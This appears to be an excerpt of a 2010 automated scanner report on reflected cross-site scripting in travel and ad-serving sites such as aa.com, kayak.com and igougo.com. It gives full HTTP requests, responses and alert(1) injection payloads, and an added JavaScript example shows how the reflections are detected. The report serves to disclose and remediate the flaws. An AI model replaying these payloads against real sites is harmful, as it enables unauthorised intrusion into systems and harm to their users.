GET /content/0/1091/united_econPlus_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-1%3Fmpt%3D163030862b9e"%3balert(1)//782c32c02ce&mpt=1630308&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/y%3B232570606%3B0-0%3B4%3B26971087%3B2321-160/600%3B38775193/38792950/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D160x600%3Btile%3D13%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:57:58 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 15:56:06 GMT
ETag: "64f0ae-b7b-49208ee861180"
Accept-Ranges: bytes
Content-Length: 6802
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aee7b"%3balert(1)//b205ebd6df3 was submitted in the mpvc parameter. This input was echoed as aee7b";alert(1)//b205ebd6df3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/1091/united_econPlus_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-1%3Fmpt%3D1630308&mpt=1630308&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/y%3B232570606%3B0-0%3B4%3B26971087%3B2321-160/600%3B38775193/38792950/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3faee7b"%3balert(1)//b205ebd6df3 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D160x600%3Btile%3D13%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:58:14 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 15:56:06 GMT
ETag: "64f0ae-b7b-49208ee861180"
Accept-Ranges: bytes
Content-Length: 6778
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c68e7"%3balert(1)//4b54cb0ffd3 was submitted in the mpck parameter. This input was echoed as c68e7";alert(1)//4b54cb0ffd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/1091/united_econPlus_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-0%3Fmpt%3D1630355c68e7"%3balert(1)//4b54cb0ffd3&mpt=1630355&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/o%3B232570605%3B0-0%3B8%3B26971087%3B4307-300/250%3B38775225/38792982/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:58:09 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 15:56:40 GMT
ETag: "64f0b2-b7b-49208f08cde00"
Accept-Ranges: bytes
Content-Length: 6802
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 108d2"%3balert(1)//fe1fb743140 was submitted in the mpvc parameter. This input was echoed as 108d2";alert(1)//fe1fb743140 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/1091/united_econPlus_300x250.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F1091-113333-10846-0%3Fmpt%3D1630355&mpt=1630355&mpvc=http://redacted.host.name/click%3Bh%3Dv8/3a6e/3/0/%2a/o%3B232570605%3B0-0%3B8%3B26971087%3B4307-300/250%3B38775225/38792982/1%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852%3B%7Eaopt%3D2/1/8c/0%3B%7Esscs%3D%3f108d2"%3balert(1)//fe1fb743140 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:58:25 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 15:56:40 GMT
ETag: "64f0b2-b7b-49208f08cde00"
Accept-Ranges: bytes
Content-Length: 6778
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e260"><script>alert(1)</script>8e466969b08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire7e260"><script>alert(1)</script>8e466969b08/retargeting_air_results@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.hotwire.com/air/results.jsp?searchTokenId=1&backButtonInputId=index
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:59:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Sun, 12-Dec-2010 07:51:02 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc055"><script>alert(1)</script>a6b9f53984a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_air_results@Bottom3cc055"><script>alert(1)</script>a6b9f53984a HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.hotwire.com/air/results.jsp?searchTokenId=1&backButtonInputId=index
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:59:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Sun, 12-Dec-2010 07:51:09 GMT;path=/
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3850f"-alert(1)-"dd9070638b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ube/core/us3850f"-alert(1)-"dd9070638b4/compactSearch.do HTTP/1.1 Host: travel.united.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb254'%3bbe327908d was submitted in the REST URL parameter 4. This input was echoed as fb254';be327908d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/242590839/directfb254'%3bbe327908d HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6105 Content-Type: text/html Expires: 0 X-Powered-By: ASP.NET Date: Sun, 12 Dec 2010 16:01:09 GMT Connection: close
4.20. http://www.aa.com/FlightSearch [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.aa.com
Path: /FlightSearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37454"><img%20src%3da%20onerror%3dalert(1)>be1efe7f575 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37454"><img src=a onerror=alert(1)>be1efe7f575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /FlightSearch?37454"><img%20src%3da%20onerror%3dalert(1)>be1efe7f575=1 HTTP/1.1 Host: www.aa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache,max-age=0 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: v1st=3B5EA39B7D61C0B2; Expires=Wed, 19 Feb 2020 14:27:59 GMT; Path=/; Domain=.aa.com Set-Cookie: JSESSIONID=0000ECY392cQHn_4BWfUaKQOrgP:14f0juqsd; Path=/ Date: Sun, 12 Dec 2010 16:01:10 GMT Server: On-Demand Router/1.0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Via: On-Demand Router/1.0 Content-Length: 173726 Connection: close Vary: Accept-Encoding, User-Agent
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- Meta Tags --> <meta http-equiv="Expires" content="0"/> <meta http-equiv="Pragma" con ...[SNIP]... <input type="hidden" name="37454"><img src=a onerror=alert(1)>be1efe7f575" value="1" /> ...[SNIP]...
4.21. http://www.allhotels.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.allhotels.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a781'%3bfd7ffdf5a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a781';fd7ffdf5a60 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2a781'%3bfd7ffdf5a60=1 HTTP/1.1 Host: www.allhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 16:01:41 GMT Set-Cookie: JSESSIONID=C644E569A59469676303FC7121DA0470.p0002; Path=/ Content-Type: text/html;charset=utf-8 Content-Language: en Vary: Accept-Encoding,User-Agent Set-Cookie: ROUTEID=.p002; path=/ Connection: close Content-Length: 90626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... frooms = '0'; var cannonBallBuilder=new CanonBallBuilder(); checkInDate = $.format.date(checkInDate, dateFormat); checkOutDate = $.format.date(checkOutDate, dateFormat); var urlParamsCannonBall = "2a781';fd7ffdf5a60=1&pageId=allHotelsHomePage"; var urlParamsForAjaxCall = "2a781';fd7ffdf5a60=1&destination="; var selectedMinPrice=0; var selectedMaxPrice=0; var isMinMaxSet=false; var globalMin=0; var globalMax ...[SNIP]...
4.22. http://www.allhotels.com.ec/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.allhotels.com.ec
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b5d'%3b8316182bbaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8b5d';8316182bbaf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e8b5d'%3b8316182bbaf=1 HTTP/1.1 Host: www.allhotels.com.ec Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 16:01:39 GMT Set-Cookie: JSESSIONID=EFF05AA96C644136F67B584BCA7B5142.p0002; Path=/ Content-Type: text/html;charset=utf-8 Content-Language: es Vary: Accept-Encoding,User-Agent Set-Cookie: ROUTEID=.p002; path=/ Connection: close Content-Length: 91878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... BallBuilder=new CanonBallBuilder(); checkInDate = $.format.date(checkInDate, dateFormat); checkOutDate = $.format.date(checkOutDate, dateFormat); var urlParamsCannonBall = "pageId=allHotelsHomePage&e8b5d';8316182bbaf=1"; var urlParamsForAjaxCall = "e8b5d';8316182bbaf=1&destination="; var selectedMinPrice=0; var selectedMaxPrice=0; var isMinMaxSet=false; var globalMin=0; var globalMax=0; var filterBySlider=f ...[SNIP]...
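The three findings above (and the earlier ones for travel.united.com and the redacted host) all rest on the same mechanism: a payload is wrapped in two random markers, the response is searched for the markers, and what came back between them is compared with what was sent, after which the surrounding syntax is classified. The following is an added example, not code from the report or from any scanner; it reconstructs that reasoning over response bodies assembled from fragments the report quotes (the aa.com hidden input, the allhotels.com script variable and the kayak.com 400 page), using the marker values the report shows. The wording it produces is modelled on the report's phrasing; the sample bodies are constructed and nothing here touches a network.

```javascript
// Added example; not code from the report. It reproduces the reasoning behind
// statements such as "copied into a JavaScript string which is encapsulated in
// double quotation marks" and "echoed as ...": submit a payload wrapped in two
// random markers, locate the markers in the response, compare what came back
// in between, and classify the syntax around it. The response bodies are
// constructed from fragments the report quotes; nothing here uses a network.

function randomMarker(len) {
  let out = '';
  while (out.length < len) out += Math.floor(Math.random() * 16).toString(16);
  return out;
}

// The markers let the reflection be located even when the application alters
// the payload in the middle (URL decoding, entity encoding, stripping).
function buildProbe(payload, prefix = randomMarker(5), suffix = randomMarker(11)) {
  return { prefix, payload, suffix };
}

// Text that came back between the two markers, or null if not both present.
function findReflection(body, probe) {
  const start = body.indexOf(probe.prefix);
  if (start < 0) return null;
  const from = start + probe.prefix.length;
  const end = body.indexOf(probe.suffix, from);
  return end < 0 ? null : body.slice(from, end);
}

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Report wording: unmodified, unmodified apart from the URL decoding every
// query-string value receives, or "echoed as" the transformed text.
function describeEcho(body, probe) {
  const got = findReflection(body, probe);
  if (got === null) return 'not reflected';
  if (got === probe.payload) return 'echoed unmodified';
  if (got === safeDecode(probe.payload)) return `echoed as ${got} (URL-decoded)`;
  return `echoed as ${got}`;
}

// Quote character still open at the end of s, or null. A backslash-escaped
// quote does not close a JavaScript string, so it is skipped.
function openQuote(s) {
  let open = null;
  for (let i = 0; i < s.length; i++) {
    const c = s[i];
    if (c === '\\' && open !== null) { i++; continue; }
    if (c === '"' || c === "'") {
      if (open === null) open = c;
      else if (open === c) open = null;
    }
  }
  return open;
}

const quoteName = q => (q === '"' ? 'double' : 'single') + ' quotation marks';

// Context just before the reflection: a string inside a <script> block, a
// quoted attribute value inside a tag, or plain text between tags.
function classifyContext(body, probe) {
  const idx = body.indexOf(probe.prefix);
  if (idx < 0) return 'not reflected';
  const before = body.slice(0, idx);
  const lower = before.toLowerCase();
  const scriptOpen = lower.lastIndexOf('<script');
  if (scriptOpen > lower.lastIndexOf('</script')) {
    const q = openQuote(before.slice(before.indexOf('>', scriptOpen) + 1));
    return q ? `JavaScript string encapsulated in ${quoteName(q)}` : 'JavaScript code';
  }
  const tagOpen = before.lastIndexOf('<');
  if (tagOpen > before.lastIndexOf('>')) {
    const q = openQuote(before.slice(tagOpen));
    return q ? `HTML tag attribute encapsulated in ${quoteName(q)}` : 'HTML tag, unquoted attribute';
  }
  return 'plain text between tags';
}

// Constructed response bodies built around fragments quoted in the report.
const SAMPLES = {
  aaCom: `<html><body><form><input type="hidden" name="37454"><img src=a onerror=alert(1)>be1efe7f575" value="1" /></form></body></html>`,
  allhotels: `<html><head><script type="text/javascript">var frooms = '0'; var urlParamsCannonBall = "2a781';fd7ffdf5a60=1&pageId=allHotelsHomePage";</script></head><body></body></html>`,
  kayak: `<html><body><p>Bad request<br> Request: /v35739dc5<script>alert(1)</script>9cc557c6740/h/nvtl/califrame.vtl</br></p></body></html>`,
};

// Probes as they appear in the report's requests (query values URL-encoded).
const PROBES = {
  aaCom: buildProbe('"><img%20src%3da%20onerror%3dalert(1)>', '37454', 'be1efe7f575'),
  allhotels: buildProbe("'%3b", '2a781', 'fd7ffdf5a60'),
  kayak: buildProbe('<script>alert(1)</script>', '39dc5', '9cc557c6740'),
};

function scanAll() {
  const out = {};
  for (const key of Object.keys(SAMPLES)) {
    out[key] = {
      context: classifyContext(SAMPLES[key], PROBES[key]),
      echo: describeEcho(SAMPLES[key], PROBES[key]),
    };
  }
  return out;
}

console.log(scanAll());
```

The "echoed as" distinction matters for triage: a `%3b` that comes back as `;` is only the normal query-string decoding, whereas a `"` that comes back as `&quot;` or disappears indicates a filter that the manual examination the report recommends should look at.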
4.23. http://www.igougo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.igougo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c36"style%3d"x%3aexpression(alert(1))"195a9c2eff1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3c36"style="x:expression(alert(1))"195a9c2eff1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers; CSS expressions were dropped from standards mode in IE8, so the payload as shown runs only in earlier versions or in compatibility mode. The underlying flaw, an unencoded double quotation mark reaching an attribute value, is browser-independent and can be exploited with an event-handler attribute instead.
Request
GET /?a3c36"style%3d"x%3aexpression(alert(1))"195a9c2eff1=1 HTTP/1.1 Host: www.igougo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 15:59:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=hqxfjbju52drq4j343icrf55; path=/; HttpOnly Set-Cookie: UUIDCookie=360ca53477b840faa7819da391236fbe; expires=Mon, 12-Dec-2011 02:09:34 GMT; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 123209
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"/> <title>Vacation and Hotel Reviews, Travel Photos and Pictures, Travel Deals - IgoUgo</title> <meta name="description" c ...[SNIP]... <base href="http://www.igougo.com/Default.aspx?a3c36"style="x:expression(alert(1))"195a9c2eff1=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39dc5<script>alert(1)</script>9cc557c6740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v35739dc5<script>alert(1)</script>9cc557c6740/h/nvtl/califrame.vtl HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
Response
HTTP/1.1 400 Bad Request Server: Apache Context-Type: text/html Vary: Accept-Encoding Content-Type: text/plain; charset=UTF-8 Date: Sun, 12 Dec 2010 15:52:18 GMT Connection: close Content-Length: 547
<p> Your browser sent a request that this ser ...[SNIP]... <br> Request: /v35739dc5<script>alert(1)</script>9cc557c6740/h/nvtl/califrame.vtl</br> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84d2a</script>d4ea5dac053 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <script> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cautious-online-shoppers-more-likely-to-buy-04674784d2a</script>d4ea5dac053/ HTTP/1.1 Host: www.marketingvox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
